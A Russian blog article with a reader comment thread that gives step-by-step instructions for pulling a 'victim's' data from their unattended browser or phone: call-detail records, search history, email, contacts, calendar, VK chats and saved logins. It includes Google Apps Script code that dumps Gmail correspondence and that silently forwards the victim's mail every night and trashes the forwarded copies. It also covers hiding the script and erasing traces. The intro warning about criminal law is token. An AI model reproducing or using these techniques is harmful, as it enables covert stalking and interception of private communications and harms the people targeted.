Что интересного можно собрать, получив доступ к чужому браузеру на 5 минут

|
FavoriteLoading В закладки
Что интересного можно собрать, получив доступ к чужому браузеру на 5 минут

Применяя советы из статьи помните об Уголовном Кодексе, золотом правиле нравственности и о том, как неприятно будет человеку, если он узнает, что вы делали что-то подобное.

Этот материал — продолжение статьи Что интересного можно собрать, получив доступ к чужому Mac на минуту. В ней написано о том, какую информацию о человеке можно узнать из его компьютера, пока тот ненадолго отошел. Сегодня расскажу о фишках по быстрому сбору информации из браузера.

Многие сайты не просят авторизации с паролем при каждом заходе на них и это открывает огромные возможности для доморощенных детективов. Все фишки из статьи просты, выполняются за несколько минут и не требуют теоретической подготовки.

Но если вдруг соберетесь применять их для реальной слежки, рекомендую немного потренироваться на своем компьютере, чтобы чувствовать себя уверенно.

Естественно, все эти знания могут вам пригодиться для личных мирных целей: сбор информации из собственного почтового ящика, наведение порядка в контактах и т.д.

1. Получаем детализацию звонков

mts_detalization

Чтобы получить детальную информацию о звонках абонентах не нужно иметь связей в органах или тайно снимать скан паспорта, готовясь атаковать менеджера салона сотовой связи приемами социнженерии. Достаточно получить аппарат с нужной симкой на пять минут в личное пользование.

У МТС (и Билайн вроде тоже), если раздать WiFi с телефона, то с компьютера вход в личный кабинет осуществляется без пароля. В личном кабинете можно заказать PDF (или XLS) файл с детализацией звонков за полгода (или более короткий срок) и послать на любой адрес электронной почты. И этот процесс занимает меньше минуты! Естественно, тоже самое можно провернуть, если зайти в личный кабинет непосредственно со смартфона.

Другие операторы я не проверяла, но скорее всего у них аналогичная ситуация. Так что не стоит просматривать историю звонков на телефоне, лучше сразу послать детализацию себе на почту. Очень удобно, что в файле видно из каких регионов идут звонки. Можно отследить местоположение абонента в разные периоды:
mts_detalization_file

Свести номера из детализации с реальными людьми поможет восьмой раздел из статьи Что интересного можно собрать, получив доступ к чужому компьютеру Mac на минуту, либо информация в пункте 4 текущего текста.

2. Смотрим историю поиска

Открываем history.google.com, нажимаем на иконку «три вертикальные точки» и в открывшемся меню выбираем пункт Download searches, соглашаемся с условиями и закрываем уведомление о том, что архив с историей поиска придет к нам на почтовый ящик. Открываем Gmail и дожидаемся письма с искомым файлом (придет через пару минут). Не забываем удалить это письмо.

Поисковые запросы в архиве распределены по месяцам в файлы формата json. Его можно конвертировать в файл Microsoft Excel на сайте json-xls.com.

3. Сохраняем себе чужие письма

Это трюк проходит только с почтовым ящиками на Gmail. Идем на docs.google.com и создаем новый файл. Открываем Инструметы->Редактор скриптов и копируем в него следующий код:
[jscript]
function collectEmails() {
var doc = DocumentApp.create(‘Переписка’); // Новый файл появится в корневой папке Google диска
var searchText = "[email protected]"; // Адрес, переписку с которым надо сохранить
var finalText = ""; // Переменная в которую будем собирать тексты писем
var body = doc.getBody();
var threads = GmailApp.search(searchText); //Ищем все письма, содержащие искомый адрес
for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем
var messages = threads[x].getMessages(); // Разбираем цепочку по письмам
for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо
finalText=finalText + messages[i].getSubject() + messages[i].getPlainBody() + "";// Считываем из него текст и тему
}
body.appendParagraph(finalText); // Записываем тексты и темы всех писем в файл
}
}
[/jscript]

Нажимаем кнопку запуска и соглашаемся на предложение о сохранение проекта. Еще раз нажимаем на кнопку запуска и даем скрипту разрешение на доступ к почте. Никаких паролей никто не спрашивает. Готовый файл можно скачать себе на флешку для последующего ознакомления (Файл -> Скачать как). Не забываем об удалении всех созданных файлов.

Метод search() можно использовать не только для поиска переписки с конкретным человеком. Вот другие примеры поисковых запросов, которые можно указать в скобках:

  • from:Иван Иванов — письма от адресата с определенным именем;
  • subject:Расчет — письма с определенной темой;
  • has:attachment — письма, у которых есть прикрепленные файлы;
  • is:unread — непрочитанные письма;
  • is:spamed — письма из папки «Спам»;
  • after: 2016/04/01 — письма, отправленные после 1 апреля 2016 года;
  • before: 2016/04/01 — письма, отправленные до 1 апреля 2016 года;
  • circle:Семья — поиск писем от участников круга «Семья»;
  • size:2 000 000 — письма больше 2 мегабайт.

Если вы хотите использовать несколько параметров, то указывайте их через пробел.

Можно было просто скачать почтовый ящик в формате mbox, но для этого необходимы ввод пароля и длительное ожидание.

4. Экспортируем контакты из Gmail

contact_export
Идем на contacts.google.com, в правом меню выбираем пункт Экспорт, читаем сообщение о том, что экспорт поддерживается только старой версией контактов и переходим на нее по ссылке в окне. Попав в старую версию, нажимаем на шестеренку и в выпадающем меню выбираем пункт Экспорт, выбираем параметры экспорта в появившемся окне и нажимаем на кнопку экспорт. В папке загрузок ищем CSV-файл, который можно открыть в Excel, Numbers или Google Docs.

5. Следим за жизнью жертвы

Идем на calendar.google.com, нажимаем на шестеренку, выбираем пункт меню Настройки -> Календари, находим интересующий нас календарь и переходим о ссылке Открыть общий доступ к календарю слева от него. На открывшейся странице указываем электронный адрес аккаунта Google, с которого собираетесь наблюдать за календарем.

Пользователь обнаружит слежку за своим расписанием, только если захочет расшарить его кому-то еще и зайдет в настройки.

6. Читаем чужую почту каждый день

Часто ли вы смотрите папку «Удаленные»? Большинство людей, которые не слишком активно пользуются почтой, заглядывают в нее раз в квартал и можно спокойно пересылать их письма себе.

Если в Gmail настроить автоматическую пересылку почты традиционным способом на некий адрес, то неделю при заходе в почту будет отображаться всплывающее уведомление об этом сверху экрана. Это делается в целях защиты пользователя от любителей следить за чужой перепиской.

Но если сделать это с помощью Google Apps Script, то никто ничего не заметит (если, конечно, жертва регулярно не просматривает список триггеров GAS).

Идем на docs.google.com и создаем новый файл. Открываем Инструметы->Редактор скриптов и копируем в него следующий код:
[jscript]
function forwardEmails() {
var searchText = "newer_than:1d";
var threads = GmailApp.search(searchText); // Ищем письма, отправленные в последние сутки
for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем
var messages = threads[x].getMessages(); // Разбираем цепочку по письмам
for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо
messages[i].forward("[email protected]");// Пересылаем письмо на нужный адрес
}
}
}
[/jscript]

Этот код пересылает на определенный адрес все письма, которые отправлены в последние сутки (естественно, при вставке кода надо не забыть этот адрес указать). При желании можно добавить другие фильтры поиска писем (они описаны в третьем разделе этой статьи). Теперь надо вставить код, который будет удалять пересланные письма из папки «Отправленные»:

[jscript]
function deletedEmails() {
var searchText = "to:[email protected]";
var threads = GmailApp.search(searchText); // Ищем письма, отправленные на адрес для слежки
for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем
var messages = threads[x].getMessages(); // Разбираем цепочку по письмам
for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо
messages[i]..moveToTrash(); // Перемещаем письмо в папку удаленные
}
}
}
[/jscript]

А теперь нам нужно сделать так, чтобы эти две функции запускались каждую ночь. В редакторе скриптов идем в Ресурсы -> Триггеры текущего проекта

Сохраняем изменения. Все! Теперь каждое утро вы можете читать письма жертвы!

К сожалению, если человек активно пользуется Google Docs, то он может обнаружить пустой файл со скриптами. Но если вставить в нее инфу о горячих клавишах для сервисов Google и назвать Autogenerated Help Document, то есть шанс, что в суете дел человек не увидит в нем опасности. Можно еще подписать где-нибудь предупреждение, чтобы человек не удалял этот файл, если хочет получать новую полезную информацию.

Если вышеприведенный абзац кажется вам смешным, вспомните строчку: «И обмануть меня нетрудно, я сам обманываться рад». Человек скорее поверит, что Google сам создает ему файлы помощи, чем предположит, что кто-то лазил в его Google Drive в его отсутствие, так как подсознание охраняет человека от столь травмирующих фактов.

7. Сохраняем переписку VK и прочие страницы с личной информацией

vk_in_pdf
Для переписки VK совет будет предельно простой: прокручиваем страницу с диалогами максимально вниз и выбираем пункт меню Файл -> Сохранить/либо Экспортировать как PDF. После копируем сохраненный файл к себе на флешку и по завершению операции в спокойной обстановке изучаем собеседников человека и их страницы. Аналогично можно поступить со всеми сайтами, на которых есть возможность обмениваться личными сообщениями.

Если очень надо и у вас есть хотя бы полчаса доступа, то можно намутить сохранитель сообщений на iMacros, который сохранит переписку полностью. Но готовый код в статье дать сложно, так как там необходимо использовать указатели элементов по координатам X,Y, которые у каждого пользователя будут свои. А для описания общего подхода к написанию таких макросов нужна отдельная статья. Что-то можно почерпнуть из Хочешь я посижу в интернете за тебя?. Плюс этот способ уже выходит за рамки 5-минутного вторжения.

8. Узнаем на каких сайтах и под какими логинами зарегистрирован человек

parols_in_safari

В большинстве браузеров хранится список сохраненных логинов и паролей для сайтов, на которых зарегистрирован пользователь. В Safari их можно посмотреть в Safari->Настройки->Пароли. Список сайтов с логинами можно скопировать, последовательно нажав Command + A и Command + С.

9. IP-адрес

Если есть подозрения, что человек троллит вас в комментах, делает фейковые заказы в вашем интернет магазине, нагло ворует контент с вашего проекта (таких людей можно выследить с помощью «Вебвизора» от Яндекс.Метрики), то нужно сравнить его IP-адрес с IP хулигана, определенный счетчиком. Сделать это можно на 2ip.ru.

Не забываем заметать следы

После завершения всех операций необходимо аккуратно почистить историю, список загрузок и папку загрузок.

А также необходимо сделать так, чтобы история изменений файлов на Google Drive выглядела естественно, то есть, чтобы сверху уведомления о создании новой таблицы появился список действий (размером с правую панель), которые бы не вызывали подозрений у жертвы.

Пример как это сделать: тайком позвонить другу и попросить расшарить жертве какие-нибудь файлы на Google Диске (со словами: сделай сейчас, пожалуйста, чтобы не забыть). И надо подгадать так, чтобы файлов/папок с файлами было несколько.

Естественно, это далеко не полный список того, что можно вытащить из браузера человека. Если как следует подумать (особенно над тем, как отвлечь жертву хотя бы на полчасика), то можно обнаружить десятки не менее эффективных фишек.

Если вам интересна тема любительской разведки и сбора данных, то возможно вам понравятся статьи:

FavoriteLoading В закладки
undefined
iPhones.ru
Применяя советы из статьи помните об Уголовном Кодексе, золотом правиле нравственности и о том, как неприятно будет человеку, если он узнает, что вы делали что-то подобное. Этот материал — продолжение статьи Что интересного можно собрать, получив доступ к чужому Mac на минуту. В ней написано о том, какую информацию о человеке можно узнать из его...
Прокомментировать

🙈 Комментарии 29

  1. Майор avatar
    Майор9 мая 2016
    3

    Отличная статья :)

    Ирина Чернова avatar
    0

    @Майор, :-)

    vadimi76 avatar
    vadimi769 мая 2016
    4

    @Ирина Чернова, статейка ваша тянет на ст. 33 УК РФ / Подстрекательство к совершению преступления /.

    vadimi76 avatar
    vadimi769 мая 2016
    1

    И еще ст. 159 УК РФ (пособничество в совершении мошенничества).

    Ирина Чернова avatar
    0

    @vadimi76, большое спасибо за напоминание) Комсомольская правда публиковала статьи о том, как поддельные документы покупать и до сих пор выходит газета. А семейный и офисный мелкий шпионаж настолько обыденная вещь, что ей точно никто заниматься не будет.

    vadimi76 avatar
    vadimi769 мая 2016
    1

    @Ирина Чернова, это не оправдание. Если любой идиот воспользуется вашими советами и пойдет на преступление, а потом сольет вас как источник своего вдохновения, не удивляйтесь концовке.

    Ирина Чернова avatar
    0

    @vadimi76, я в 2014-2015 годах работала в журнале, в котором материалы про взлом, слежку, разведку печатались пачками. И это были статьи отнюдь не про сохранение почты скриптами… Издается он с 1999 года. В издательстве работал штатный юрист, с подачи которого на некоторые материалы ставили предупреждения о снятии ответственности с редакции и все спали спокойно. А товарищей, которые пользовались советами из статей хватало всегда)
    Впрочем, все когда-то случается в первый раз(((

    lonz avatar
    lonz10 мая 2016
    0

    @Ирина Чернова, КП — пропутинская пропагандистская газетёнка, кто её прикроет?

    Ирина Чернова avatar
    1

    @lonz, да, Вы правы, с КП не совсем удачный пример.

    Ирина Чернова avatar
    0

    @vadimi76, почитала статью 33 УК. РФ. Это не подстрекательство однозначно. Пособничество информацией может быть. Но в начале стоит предупреждение о том, что эти деяния могут быть уголовно наказуемы. Десятки лет в прессе публикуются статьи и с гораздо более серьзными трюками, но никто еще журналы за пособничество не судил)

    Ирина Чернова avatar
    0

    @vadimi76, и большое спасибо вам за внимание и заботу)

    Makarov avatar
    Makarov10 мая 2016
    0

    @vadimi76, скройся уже, ведешь себя хуже бабы. Одно название что штаны носишь.

  2. vadimi76 avatar
    vadimi769 мая 2016
    0

    Как минимум вам может светить профилактическая беседа с сотрудниками управления “К” МВД России.

    Ирина Чернова avatar
    0

    @vadimi76, исходя из моих представлений о деятельности отдела “К” им есть кем и чем заняться, кроме авторов статеек о том, как Google-скриптами почту сохранять, пока человек отошел на пять минут)
    Но я не исключаю, что Вы осведомлены лучше)

    Makarov avatar
    Makarov10 мая 2016
    1

    @Ирина Чернова, ну не общайтесь вы с такими вадимами, ясно же что до сих пор с мамой он живет и тд. Материал отличный, спс)

    Ирина Чернова avatar
    0

    @Makarov, :-)

    Ирина Чернова avatar
    0

    @vadimi76, и очень сложно доказать пострадавшему, что это вторжение в компьютер было без его согласия.

    Если бы я писала статьи: 10 способов узнать пароль к чужой почте, то можно было бы говорить о каком-то преступлении возможном…

    А представьте: муж взял телефон жены и заказал с него детализацию. Как она докажет, что не просила его это делать и не сама дала телефон ему в руки?

    Vizakenjack avatar
    Vizakenjack9 мая 2016
    0

    @vadimi76, господи, какой же ты нудный

    emiljohn avatar
    emiljohn9 мая 2016
    0

    @Vizakenjack, прочитал мои мысли) @vadimi76, ещё какой нудный

    Makarov avatar
    Makarov10 мая 2016
    0

    @vadimi76, че ты ведешь себя терпилой, да еще когда с женщиной общаешься? Носки наверняка сам себе штопаешь, клоун?)))

  3. G-3 avatar
    G-39 мая 2016
    0

    Ирина, статья интересная! Можно было назвать в духе обновлённого айфонс.ру: “Почему тебе не надо пользоваться гуглосервисами”. Ещё раз убедился, что пользоваться ими не следует!

    Ирина Чернова avatar
    1

    @G-3, а какие у Вас есть еще на это причины, кроме тотального сбора Google всевозможных данных о Вас?)

    G-3 avatar
    G-39 мая 2016
    0

    @Ирина Чернова, после эпл их вид вызывает эстетическую боль, как будто разные алкаши их проектировали, нет интеграции, есть набор, их количество зашкаливает, а полезность с ростом количества снижается. Ну и плюс Гугл сам их время от времени закрывает и заканчивает поддержку. Для экспериментирующих студентов одним словом.

  4. D@ZENT avatar
    [email protected]9 мая 2016
    0

    ][… Что ут скажешь :)
    Полезно

    Майор avatar
    Майор10 мая 2016
    0

    @[email protected], ][леб?

    Ирина Чернова avatar
    0

    @Майор, :-D если бы я не знала что значат эти две скобочки, то подумала бы что “][…” это какое-то ругательство типа “П…ц”. Чисто визуальная ассоциация…

  5. poznyak avatar
    poznyak10 мая 2016
    1

    Не хотел бы я встречаться с Ириной :D

  6. bykoff avatar
    bykoff11 мая 2016
    0

    Круто :)

  7. ILYA2606 avatar
    ILYA260611 мая 2016
    0

    Ирин, а как на такие статьи реагирует ваш муж? :)

Вы должны авторизоваться или зарегистрироваться для комментирования.

Нашли орфографическую ошибку в новости?

Выделите ее мышью и нажмите Ctrl+Enter.

Как установить аватар в комментариях?

Ответ вот здесь